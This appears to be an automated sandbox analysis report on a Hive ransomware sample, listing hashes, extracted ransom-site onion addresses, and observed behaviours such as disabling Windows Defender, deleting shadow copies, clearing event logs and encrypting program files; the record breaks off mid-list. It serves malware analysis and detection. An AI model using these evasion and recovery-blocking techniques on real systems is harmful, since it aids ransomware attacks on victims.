Analysis
-
max time kernel
133s -
max time network
128s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
22-11-2021 11:25
Static task
static1
Behavioral task
behavioral1
Sample
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
Resource
win10-en-20211014
General
-
Target
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
-
Size
2.7MB
-
MD5
d8d33f00e7124fe123cc2a581000a2e6
-
SHA1
233ef1e48543dea370f543c08d7c1ff6adba6e47
-
SHA256
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442
-
SHA512
726f6b154804755e7999d7ccdef8c0671d3a3b988dfeb54ca8f7090e791ef27056688aa9473771b85955932117ce0641eb9aca65d7a0e296b61382d5d804cc2b
Malware Config
Extracted
C:\Program Files\7-Zip\Zd66_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 880 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1336 bcdedit.exe 1348 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NEWS.XML.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_nimb4spE1iM0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00671_.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_XSa8G9aPvS80.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_ChHXz9KbpxU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01152_.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_zwaGMF0M7iQ0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299171.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_-epNR_3KwlM0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_v-aaMGSHoCk0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_GXIcp33Kzl80.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-down.png 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01149_.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_9gfuKL9UB4Q0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02055_.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_pmb4AH8ZfIs0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN090.XML.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_a2vCBSLD3cw0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ps.txt.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_WdEn0rs7mdc0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-options-keymap.xml_hidden.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_M7BAe4v4TrE0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\Zd66_HOW_TO_DECRYPT.txt 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\css\calendar.css 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\setting_back.png 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241037.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_IIqtlWkf5qA0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00234_.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_HagpbjVFUw00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Windows Media Player\fr-FR\WMPDMCCore.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.zh_CN_5.5.0.165303.jar.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_cV1q34DNXI80.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\THMBNAIL.PNG.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_hXGRWWr5cEc0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_3g-zn2N0VmY0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00212_.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_rEOK78jFv2A0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Angles.thmx.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_BEo-ah_6J5A0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\ACT3.SAM.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_9alf8zuOBH00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\TAB_ON.GIF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_TtfPyfqsBzQ0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_QuLrbj2YwPY0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\gadget.xml 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\highDpiImageSwap.js 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200183.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_57lk41UmEEk0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115844.GIF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_2f25IDEhOLY0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sitka.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_lJ_-WIw01fw0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_B9bHrKNd7L80.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_crX3VsrqETE0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File created C:\Program Files\Microsoft Games\More Games\en-US\Zd66_HOW_TO_DECRYPT.txt 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Memories_buttonClear.png 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_EHHTNwU63OQ0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTO\vstoee100.tlb.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_40ichTtrUaw0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\css\settings.css 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayenne.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_HBL8sp3SPRo0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msdaremr.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\BLUEPRNT.ELM.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_riZDyEXec7s0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationUp_ButtonGraphic.png 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_uTlCdChwbuc0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN001.XML.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_q4q2r4KOIdw0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0234001.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_2bI9pfmWFI80.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00068_.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_F4YwX7snN7I0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\LightSpirit.css.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_aSY1Elq8Jy00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN086.XML.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_YRPz1KArEZ80.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square.png 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_SelectionSubpicture.png 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile16.png 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RADIAL\PREVIEW.GIF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_SG783LoaCJU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0205582.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_N16g2PQjA_40.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Lagos.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_y7OmbNFJPLU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_H9r4DEAF6UU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_W9OnrA6dS9k0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00419_.WMF.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_QVo6pbnGLdg0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\validation.js.sGrDfqcuyaN6bwgC2ZxMpOsy1StwXDd46XK-43tjqUb_VlcQvXFxqnk0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 928 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2352 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1116 powershell.exe 2120 powershell.exe 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1612 wevtutil.exe Token: SeBackupPrivilege 1612 wevtutil.exe Token: SeSecurityPrivilege 1808 wevtutil.exe Token: SeBackupPrivilege 1808 wevtutil.exe Token: SeSecurityPrivilege 1980 wevtutil.exe Token: SeBackupPrivilege 1980 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1040 wmic.exe Token: SeSecurityPrivilege 1040 wmic.exe Token: SeTakeOwnershipPrivilege 1040 wmic.exe Token: SeLoadDriverPrivilege 1040 wmic.exe Token: SeSystemProfilePrivilege 1040 wmic.exe Token: SeSystemtimePrivilege 1040 wmic.exe Token: SeProfSingleProcessPrivilege 1040 wmic.exe Token: SeIncBasePriorityPrivilege 1040 wmic.exe Token: SeCreatePagefilePrivilege 1040 wmic.exe Token: SeBackupPrivilege 1040 wmic.exe Token: SeRestorePrivilege 1040 wmic.exe Token: SeShutdownPrivilege 1040 wmic.exe Token: SeDebugPrivilege 1040 wmic.exe Token: SeSystemEnvironmentPrivilege 1040 wmic.exe Token: SeRemoteShutdownPrivilege 1040 wmic.exe Token: SeUndockPrivilege 1040 wmic.exe Token: SeManageVolumePrivilege 1040 wmic.exe Token: 33 1040 wmic.exe Token: 34 1040 wmic.exe Token: 35 1040 wmic.exe Token: SeIncreaseQuotaPrivilege 1396 wmic.exe Token: SeSecurityPrivilege 1396 wmic.exe Token: SeTakeOwnershipPrivilege 1396 wmic.exe Token: SeLoadDriverPrivilege 1396 wmic.exe Token: SeSystemProfilePrivilege 1396 wmic.exe Token: SeSystemtimePrivilege 1396 wmic.exe Token: SeProfSingleProcessPrivilege 1396 wmic.exe Token: SeIncBasePriorityPrivilege 1396 wmic.exe Token: SeCreatePagefilePrivilege 1396 wmic.exe Token: SeBackupPrivilege 1396 wmic.exe Token: SeRestorePrivilege 1396 wmic.exe Token: SeShutdownPrivilege 1396 wmic.exe Token: SeDebugPrivilege 1396 wmic.exe Token: SeSystemEnvironmentPrivilege 1396 wmic.exe Token: SeRemoteShutdownPrivilege 1396 wmic.exe Token: SeUndockPrivilege 1396 wmic.exe Token: SeManageVolumePrivilege 1396 wmic.exe Token: 33 1396 wmic.exe Token: 34 1396 wmic.exe Token: 35 1396 wmic.exe Token: SeIncreaseQuotaPrivilege 1396 wmic.exe Token: SeSecurityPrivilege 1396 wmic.exe Token: SeTakeOwnershipPrivilege 1396 wmic.exe Token: SeLoadDriverPrivilege 1396 wmic.exe Token: SeSystemProfilePrivilege 1396 wmic.exe Token: SeSystemtimePrivilege 1396 wmic.exe Token: SeProfSingleProcessPrivilege 1396 wmic.exe Token: SeIncBasePriorityPrivilege 1396 wmic.exe Token: SeCreatePagefilePrivilege 1396 wmic.exe Token: SeBackupPrivilege 1396 wmic.exe Token: SeRestorePrivilege 1396 wmic.exe Token: SeShutdownPrivilege 1396 wmic.exe Token: SeDebugPrivilege 1396 wmic.exe Token: SeSystemEnvironmentPrivilege 1396 wmic.exe Token: SeRemoteShutdownPrivilege 1396 wmic.exe Token: SeUndockPrivilege 1396 wmic.exe Token: SeManageVolumePrivilege 1396 wmic.exe Token: 33 1396 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 840 wrote to memory of 572 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 28 PID 840 wrote to memory of 572 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 28 PID 840 wrote to memory of 572 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 28 PID 572 wrote to memory of 1504 572 net.exe 30 PID 572 wrote to memory of 1504 572 net.exe 30 PID 572 wrote to memory of 1504 572 net.exe 30 PID 840 wrote to memory of 1496 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 31 PID 840 wrote to memory of 1496 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 31 PID 840 wrote to memory of 1496 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 31 PID 1496 wrote to memory of 816 1496 net.exe 33 PID 1496 wrote to memory of 816 1496 net.exe 33 PID 1496 wrote to memory of 816 1496 net.exe 33 PID 840 wrote to memory of 1780 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 34 PID 840 wrote to memory of 1780 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 34 PID 840 wrote to memory of 1780 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 34 PID 1780 wrote to memory of 1388 1780 net.exe 36 PID 1780 wrote to memory of 1388 1780 net.exe 36 PID 1780 wrote to memory of 1388 1780 net.exe 36 PID 840 wrote to memory of 1552 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 37 PID 840 wrote to memory of 1552 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 37 PID 840 wrote to memory of 1552 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 37 PID 1552 wrote to memory of 1792 1552 net.exe 39 PID 1552 wrote to memory of 1792 1552 net.exe 39 PID 1552 wrote to memory of 1792 1552 net.exe 39 PID 840 wrote to memory of 856 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 40 PID 840 wrote to memory of 856 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 40 PID 840 wrote to memory of 856 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 40 PID 856 wrote to memory of 1096 856 net.exe 42 PID 856 wrote to memory of 1096 856 net.exe 42 PID 856 wrote to memory of 1096 856 net.exe 42 PID 840 wrote to memory of 1988 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 43 PID 840 wrote to memory of 1988 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 43 PID 840 wrote to memory of 1988 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 43 PID 1988 wrote to memory of 828 1988 net.exe 45 PID 1988 wrote to memory of 828 1988 net.exe 45 PID 1988 wrote to memory of 828 1988 net.exe 45 PID 840 wrote to memory of 1640 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 46 PID 840 wrote to memory of 1640 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 46 PID 840 wrote to memory of 1640 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 46 PID 1640 wrote to memory of 1244 1640 net.exe 48 PID 1640 wrote to memory of 1244 1640 net.exe 48 PID 1640 wrote to memory of 1244 1640 net.exe 48 PID 840 wrote to memory of 1564 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 49 PID 840 wrote to memory of 1564 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 49 PID 840 wrote to memory of 1564 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 49 PID 1564 wrote to memory of 388 1564 net.exe 51 PID 1564 wrote to memory of 388 1564 net.exe 51 PID 1564 wrote to memory of 388 1564 net.exe 51 PID 840 wrote to memory of 952 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 52 PID 840 wrote to memory of 952 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 52 PID 840 wrote to memory of 952 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 52 PID 840 wrote to memory of 1936 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 54 PID 840 wrote to memory of 1936 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 54 PID 840 wrote to memory of 1936 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 54 PID 840 wrote to memory of 1556 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 56 PID 840 wrote to memory of 1556 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 56 PID 840 wrote to memory of 1556 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 56 PID 840 wrote to memory of 2004 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 58 PID 840 wrote to memory of 2004 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 58 PID 840 wrote to memory of 2004 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 58 PID 840 wrote to memory of 916 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 60 PID 840 wrote to memory of 916 840 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 60 PID 840 wrote to memory of 916 840 